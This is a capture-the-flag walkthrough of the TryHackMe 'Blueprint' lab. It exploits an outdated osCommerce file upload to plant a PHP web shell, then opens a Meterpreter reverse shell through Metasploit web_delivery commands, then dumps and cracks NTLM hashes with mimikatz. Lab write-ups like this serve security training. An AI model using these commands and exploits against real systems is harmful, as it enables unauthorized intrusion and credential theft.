THM-Blueprint-Writeup

Hack into this Windows machine and escalate your privileges to Administrator.

Find This Room: Blueprint

Description

Blueprint is an easy level boot2root machine on TryHackMe. The machine is a Windows 7 machine which hosts a web server on port 443. That web server is an outdated version of osCommerce. After enumerating the install directory of the web app, we could install osCommerce. After that a arbitrary file upload vulnerability has been used to upload a web shell. Finally this web shell has be used to gain a Meterpreter session on the box with System privileges.

Recon

First of all an Nmap scan has been started.

sudo nmap -sC -sV -O 10.10.242.9 -oN nmap/inital -vv

After the scan a few services could be found on the target machine. Through SMB we had access to sensitive data without authentication.

On port 80 the web server is not serving anything interesting.

But on port 443 directory indexing is enabled and we could find an outdated version of osCommerce.

After navigating to /oscommerce-2.3.4/catalog/ and opening the developer tools, the web server seemed to make requests to localhost.

For further enumeration the /etc/hosts file had to be changed.

Soon a gobuster scan was started. We could find a directory called “install”.

gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://10.10.242.9/oscommerce-2.3.4/catalog/ -k -e

After navigating to the URL https://10.10.242.9/oscommerce-2.3.4/catalog/install we had the opportunity to install the web app.

During installation I have used the username “root” and a blank password for the database. Furthermore an admin user has been created with the username and password “admin”

Also osCommerce was outdated. So we could find exploits for this web app. The arbitrary file upload vulnerability has been used.

searchsploit oscommerce 2.3.4

You can copy the file to the local folder with the following command:

searchsploit -m php/webapps/43191.py

Next a simple PHP web shell has been created.

This web shell could be successfully uploaded by utilizing the file upload vulnerability.

By running the command whoami the output showed that the service was running as NT_AUTHORITY\SYSTEM.

Initial Access

To get a shell on the box I have utilized the Metasploit module multi/script/web_delivery. After starting Metasploit the following commands have been run:

use multi/script/web_delivery
set LHOST <tun0>
set SERVHOST <tun0 ip>
set payload windows/meterpreter/reverse_tcp
set target 3
run

Finally a command has been shown. This command could be executed via the web shell. After executing the command a Meterpreter session was opened.

With Meterpreter we could pop into a command shell and retrieve the root flag.

Cracking the NTLM hash for the user “Lab”

Mimikatz has been used, to retrive NTLM hashes. Mimikatz can be loaded via the command load mimikatz.

After successfully loading the module the hashes could be dumped via the command lsa_dump_sam.

Finally Lab’s hash could be cracked on “Crackstation”.